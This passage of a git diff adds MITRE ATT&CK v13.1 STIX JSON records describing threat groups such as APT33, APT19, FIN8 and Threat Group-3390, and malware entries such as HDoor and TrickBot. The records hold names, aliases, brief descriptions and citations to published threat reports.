"Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020." + }, + { + "source_name": "Check Point Rocket Kitten", + "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf", + "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018." + }, + { + "source_name": "TrendMicro Operation Woolen Goldfish March 2015", + "url": "https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf", + "description": "Cedric Pernet, Kenney Lu. (2015, March 19). Operation Woolen-Goldfish - When Kittens Go phishing. Retrieved April 21, 2021." + }, + { + "source_name": "IranThreats Kittens Dec 2017", + "url": "https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/", + "description": "Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020." + }, + { + "source_name": "CrowdStrike Flying Kitten ", + "url": "https://www.crowdstrike.com/blog/cat-scratch-fever-crowdstrike-tracks-newly-reported-iranian-actor-flying-kitten/", + "description": "Dahl, M.. (2014, May 13). Cat Scratch Fever: CrowdStrike Tracks Newly Reported Iranian Actor as FLYING KITTEN. Retrieved May 27, 2020." + } + ], + "modified": "2021-12-17T19:27:27.246Z", + "name": "Ajax Security Team", + "description": "[Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013)", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c.json new file mode 100644 index 0000000000000000000000000000000000000000..57967fc984b0454708392f0a73eaebcb57fa8cd1 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c.json 
@@ -0,0 +1,125 @@ +{ + "type": "bundle", + "id": "bundle--5122e52c-9c96-456b-a4c1-3cb282190a18", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-29T16:53:17.235Z", + "name": "Threat Group-3390", + "description": "[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims.(Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, manufacturing and gambling/betting sectors.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Securelist LuckyMouse June 2018)(Citation: Trend Micro DRBControl February 2020)", + "aliases": [ + "Threat Group-3390", + "Earth Smilodon", + "TG-3390", + "Emissary Panda", + "BRONZE UNION", + "APT27", + "Iron Tiger", + "LuckyMouse" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Kyaw Pyiyt Htet, @KyawPyiytHtet" + ], + "type": "intrusion-set", + "id": "intrusion-set--fb366179-766c-4a4a-afa1-52bff1fd601c", + "created": "2017-05-31T21:31:58.518Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0027", + "external_id": "G0027" + }, + { + "source_name": "Threat Group-3390", + "description": "(Citation: Dell TG-3390)(Citation: Hacker News LuckyMouse June 2018)" + }, + { + "source_name": "TG-3390", + "description": "(Citation: Dell TG-3390)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Hacker News LuckyMouse June 2018)" + }, + { + "source_name": "Emissary Panda", + "description": "(Citation: Gallagher 2015)(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Unit42 Emissary Panda May 2019)(Citation: Trend Micro Iron 
Tiger April 2021)" + }, + { + "source_name": "Iron Tiger", + "description": "(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "APT27", + "description": "(Citation: Nccgroup Emissary Panda May 2018)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "LuckyMouse", + "description": "(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "BRONZE UNION", + "description": "(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Nccgroup Emissary Panda May 2018)" + }, + { + "source_name": "Earth Smilodon", + "description": "(Citation: Trend Micro Iron Tiger April 2021)" + }, + { + "source_name": "SecureWorks BRONZE UNION June 2017", + "description": "Counter Threat Unit Research Team. (2017, June 27). BRONZE UNION Cyberespionage Persists Despite Disclosures. Retrieved July 13, 2017.", + "url": "https://www.secureworks.com/research/bronze-union" + }, + { + "source_name": "Dell TG-3390", + "description": "Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.", + "url": "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage" + }, + { + "source_name": "Unit42 Emissary Panda May 2019", + "description": "Falcone, R. and Lancaster, T. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/" + }, + { + "source_name": "Gallagher 2015", + "description": "Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as \u201cwatering holes\u201d. 
Retrieved January 25, 2016.", + "url": "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/" + }, + { + "source_name": "Hacker News LuckyMouse June 2018", + "description": "Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.", + "url": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html" + }, + { + "source_name": "Securelist LuckyMouse June 2018", + "description": "Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.", + "url": "https://securelist.com/luckymouse-hits-national-data-center/86083/" + }, + { + "source_name": "Trend Micro Iron Tiger April 2021", + "description": "Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html" + }, + { + "source_name": "Trend Micro DRBControl February 2020", + "description": "Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.", + "url": "https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf" + }, + { + "source_name": "Nccgroup Emissary Panda May 2018", + "description": "Pantazopoulos, N., Henry T. (2018, May 18). Emissary Panda \u2013 A potential new malicious tool. Retrieved June 25, 2018.", + "url": "https://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json new file mode 100644 index 0000000000000000000000000000000000000000..2f9b331155aac85f2480b3951060ac119330847d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f.json 
@@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--8f69ccbb-0350-4ae0-9c41-a5e8574e90dd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-08T22:07:25.123Z", + "name": "APT33", + "description": "[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "aliases": [ + "APT33", + "HOLMIUM", + "Elfin" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.4", + "x_mitre_contributors": [ + "Dragos Threat Intelligence" + ], + "type": "intrusion-set", + "id": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0064", + "external_id": "G0064" + }, + { + "source_name": "APT33", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "HOLMIUM", + "description": "(Citation: Microsoft Holmium June 2020)" + }, + { + "source_name": "Elfin", + "description": "(Citation: Symantec Elfin Mar 2019)" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + }, + { + "source_name": "Microsoft Holmium June 2020", + "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. 
Retrieved June 22, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "Symantec Elfin Mar 2019", + "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.", + "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b.json new file mode 100644 index 0000000000000000000000000000000000000000..0b86e87c3303ff926c3159c8b8a5f469e1afe8de --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b.json 
@@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--1801bdbb-b230-4ec4-a33e-ee1be81f2bfe", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "FIN10" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--fbe9387f-34e6-4828-ac28-3080020c597b", + "type": "intrusion-set", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0051", + "external_id": "G0051" + }, + { + "source_name": "FIN10", + "description": "(Citation: FireEye FIN10 June 2017)" + }, + { + "url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "description": "FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.", + "source_name": "FireEye FIN10 June 2017" + } + ], + "modified": "2021-05-26T12:35:39.400Z", + "name": "FIN10", + "description": "[FIN10](https://attack.mitre.org/groups/G0051) is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations. (Citation: FireEye FIN10 June 2017)", + "x_mitre_version": "1.3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826.json new file mode 100644 index 0000000000000000000000000000000000000000..aadbb48aadb2211eecb656b867f39bf6456ae41d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826.json 
@@ -0,0 +1,54 @@ +{ + "type": "bundle", + "id": "bundle--c020d200-967d-4c12-9042-e4005d151559", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T03:52:13.089Z", + "name": "FIN8", + "description": "[FIN8](https://attack.mitre.org/groups/G0061) is a financially motivated threat group known to launch tailored spearphishing campaigns targeting the retail, restaurant, and hospitality industries. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Fin8 May 2016)", + "aliases": [ + "FIN8" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.3", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "type": "intrusion-set", + "id": "intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0061", + "external_id": "G0061" + }, + { + "source_name": "FIN8", + "description": "(Citation: FireEye Obfuscation June 2017)" + }, + { + "source_name": "FireEye Obfuscation June 2017", + "description": "Bohannon, D. & Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.", + "url": "https://web.archive.org/web/20170923102302/https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html" + }, + { + "source_name": "FireEye Fin8 May 2016", + "description": "Kizhakkinan, D. et al.. (2016, May 11). Threat Actor Leverages Windows Zero-day Exploit in Payment Card Data Attacks. 
Retrieved February 12, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6.json new file mode 100644 index 0000000000000000000000000000000000000000..f5136e8ef2a30cd47107225f0c5972214771222f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6.json 
@@ -0,0 +1,90 @@ +{ + "type": "bundle", + "id": "bundle--58cfe573-3b88-46a0-94b9-cd3850d52dba", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-21T20:44:02.443Z", + "name": "APT19", + "description": "[APT19](https://attack.mitre.org/groups/G0073) is a Chinese-based threat group that has targeted a variety of industries, including defense, finance, energy, pharmaceutical, telecommunications, high tech, education, manufacturing, and legal services. In 2017, a phishing campaign was used to target seven law and investment firms. (Citation: FireEye APT19) Some analysts track [APT19](https://attack.mitre.org/groups/G0073) and [Deep Panda](https://attack.mitre.org/groups/G0009) as the same group, but it is unclear from open source information if the groups are the same. (Citation: ICIT China's Espionage Jul 2016) (Citation: FireEye APT Groups) (Citation: Unit 42 C0d0so0 Jan 2016)", + "aliases": [ + "APT19", + "Codoso", + "C0d0so0", + "Codoso Team", + "Sunshop Group" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.5", + "x_mitre_contributors": [ + "FS-ISAC", + "Darren Spruell" + ], + "type": "intrusion-set", + "id": "intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0073", + "external_id": "G0073" + }, + { + "source_name": "Sunshop Group", + "description": "(Citation: Dark Reading Codoso Feb 2015)" + }, + { + "source_name": "Codoso Team", + "description": "(Citation: FireEye APT Groups)" + }, + { + "source_name": "APT19", + "description": "(Citation: FireEye APT19)" + }, + { + "source_name": "Codoso", + "description": "(Citation: Unit 42 C0d0so0 Jan 2016)" + }, + { + "source_name": "C0d0so0", + "description": "(Citation: Unit 42 C0d0so0 Jan 2016)" + }, + { + "source_name": "FireEye APT19", + 
"description": "Ahl, I. (2017, June 06). Privileges and Credentials: Phished at the Request of Counsel. Retrieved May 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html" + }, + { + "source_name": "Dark Reading Codoso Feb 2015", + "description": "Chickowski, E. (2015, February 10). Chinese Hacking Group Codoso Team Uses Forbes.com As Watering Hole. Retrieved September 13, 2018.", + "url": "https://www.darkreading.com/attacks-breaches/chinese-hacking-group-codoso-team-uses-forbescom-as-watering-hole-/d/d-id/1319059" + }, + { + "source_name": "FireEye APT Groups", + "description": "FireEye. (n.d.). Advanced Persistent Threat Groups. Retrieved August 3, 2018.", + "url": "https://www.fireeye.com/current-threats/apt-groups.html#apt19" + }, + { + "source_name": "Unit 42 C0d0so0 Jan 2016", + "description": "Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/" + }, + { + "source_name": "ICIT China's Espionage Jul 2016", + "description": "Scott, J. and Spaniel, D. (2016, July 28). ICIT Brief - China\u2019s Espionage Dynasty: Economic Death by a Thousand Cuts. Retrieved June 7, 2018.", + "url": "https://web.archive.org/web/20171017072306/https://icitech.org/icit-brief-chinas-espionage-dynasty-economic-death-by-a-thousand-cuts/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647.json new file mode 100644 index 0000000000000000000000000000000000000000..f02d853acbc3789c28a8c8a371a4d4288a46c03f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--be34ad0b-d6f8-4de6-97d9-c10d0b402f35", + "spec_version": "2.0", + "objects": [ + { + "aliases": [ + "PittyTiger" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "intrusion-set--fe98767f-9df8-42b9-83c9-004b1dec8647", + "type": "intrusion-set", + "created": "2017-05-31T21:31:50.198Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "G0011", + "url": "https://attack.mitre.org/groups/G0011", + "source_name": "mitre-attack" + }, + { + "source_name": "PittyTiger", + "description": "(Citation: Bizeul 2014) (Citation: Villeneuve 2014)" + }, + { + "url": "https://airbus-cyber-security.com/the-eye-of-the-tiger/", + "description": "Bizeul, D., Fontarensky, I., Mouchoux, R., Perigaud, F., Pernet, C. (2014, July 11). Eye of the Tiger. Retrieved September 29, 2015.", + "source_name": "Bizeul 2014" + }, + { + "url": "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html", + "description": "Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. Retrieved September 29, 2015.", + "source_name": "Villeneuve 2014" + } + ], + "modified": "2021-10-12T23:11:41.368Z", + "name": "PittyTiger", + "description": "[PittyTiger](https://attack.mitre.org/groups/G0011) is a threat group believed to operate out of China that uses multiple different types of malware to maintain command and control.(Citation: Bizeul 2014)(Citation: Villeneuve 2014)", + "x_mitre_version": "1.2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172.json b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172.json new file mode 100644 index 0000000000000000000000000000000000000000..557e6ba762449441673b0b9fd3d151caee30ca3e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/intrusion-set/intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172.json 
@@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--6f5a12b3-0949-4067-a8d1-395b858cc05c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-02T18:03:55.294Z", + "name": "Nomadic Octopus", + "description": "\n[Nomadic Octopus](https://attack.mitre.org/groups/G0133) is a Russian-speaking cyber espionage threat group that has primarily targeted Central Asia, including local governments, diplomatic missions, and individuals, since at least 2014. [Nomadic Octopus](https://attack.mitre.org/groups/G0133) has been observed conducting campaigns involving Android and Windows malware, mainly using the Delphi programming language, and building custom variants.(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)", + "aliases": [ + "Nomadic Octopus", + "DustSquad" + ], + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "type": "intrusion-set", + "id": "intrusion-set--fed4f0a2-4347-4530-b0f5-6dfd49b29172", + "created": "2021-08-24T17:04:27.002Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0133", + "external_id": "G0133" + }, + { + "source_name": "DustSquad", + "description": "(Citation: Security Affairs DustSquad Oct 2018)(Citation: Securelist Octopus Oct 2018)(Citation: SecurityWeek Nomadic Octopus Oct 2018)" + }, + { + "source_name": "Nomadic Octopus", + "description": "(Citation: SecurityWeek Nomadic Octopus Oct 2018)(Citation: ESET Nomadic Octopus 2018)" + }, + { + "source_name": "ESET Nomadic Octopus 2018", + "description": "Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. 
Retrieved October 13, 2021.", + "url": "https://www.virusbulletin.com/uploads/pdf/conference_slides/2018/Cherepanov-VB2018-Octopus.pdf" + }, + { + "source_name": "Securelist Octopus Oct 2018", + "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 15). Octopus-infested seas of Central Asia. Retrieved November 14, 2018.", + "url": "https://securelist.com/octopus-infested-seas-of-central-asia/88200/" + }, + { + "source_name": "SecurityWeek Nomadic Octopus Oct 2018", + "description": "Kovacs, E. (2018, October 18). Russia-Linked Hackers Target Diplomatic Entities in Central Asia. Retrieved October 13, 2021.", + "url": "https://www.securityweek.com/russia-linked-hackers-target-diplomatic-entities-central-asia" + }, + { + "source_name": "Security Affairs DustSquad Oct 2018", + "description": "Paganini, P. (2018, October 16). Russia-linked APT group DustSquad targets diplomatic entities in Central Asia. Retrieved August 24, 2021.", + "url": "https://securityaffairs.co/wordpress/77165/apt/russia-linked-apt-dustsquad.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b.json new file mode 100644 index 0000000000000000000000000000000000000000..a4444aef64c669ee200ff5c6a4239374b8e08c3d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b.json 
@@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--31c6615f-5c79-4bda-acfe-c054fad240b6", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-04T20:20:59.961Z", + "name": "HDoor", + "description": "[HDoor](https://attack.mitre.org/software/S0061) is malware that has been customized and used by the [Naikon](https://attack.mitre.org/groups/G0019) group. (Citation: Baumgartner Naikon 2015)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "HDoor", + "Custom HDoor" + ], + "type": "malware", + "id": "malware--007b44b6-e4c5-480b-b5b9-56f2081b1b7b", + "created": "2017-05-31T21:32:40.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0061", + "external_id": "S0061" + }, + { + "source_name": "Baumgartner Naikon 2015", + "description": "Baumgartner, K., Golovkin, M.. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.", + "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00806466-754d-44ea-ad6f-0caf59cb8556.json b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00806466-754d-44ea-ad6f-0caf59cb8556.json new file mode 100644 index 0000000000000000000000000000000000000000..fc64574d9e841b5627121f46ed673bfb48d03939 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/malware/malware--00806466-754d-44ea-ad6f-0caf59cb8556.json 
@@ -0,0 +1,98 @@ +{ + "type": "bundle", + "id": "bundle--dbdf8fe7-ef1f-4f0a-9e22-8558a8738ff8", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-02-23T19:45:50.419Z", + "name": "TrickBot", + "description": "[TrickBot](https://attack.mitre.org/software/S0266) is a Trojan spyware program written in C++ that first emerged in September 2016 as a possible successor to [Dyre](https://attack.mitre.org/software/S0024). [TrickBot](https://attack.mitre.org/software/S0266) was developed and initially used by [Wizard Spider](https://attack.mitre.org/groups/G0102) for targeting banking sites in North America, Australia, and throughout Europe; it has since been used against all sectors worldwide as part of \"big game hunting\" ransomware campaigns.(Citation: S2 Grupo TrickBot June 2017)(Citation: Fidelis TrickBot Oct 2016)(Citation: IBM TrickBot Nov 2016)(Citation: CrowdStrike Wizard Spider October 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security", + "Cybereason Nocturnus, @nocturnus", + "Omkar Gudhate", + "FS-ISAC" + ], + "x_mitre_aliases": [ + "TrickBot", + "Totbrick", + "TSPY_TRICKLOAD" + ], + "type": "malware", + "id": "malware--00806466-754d-44ea-ad6f-0caf59cb8556", + "created": 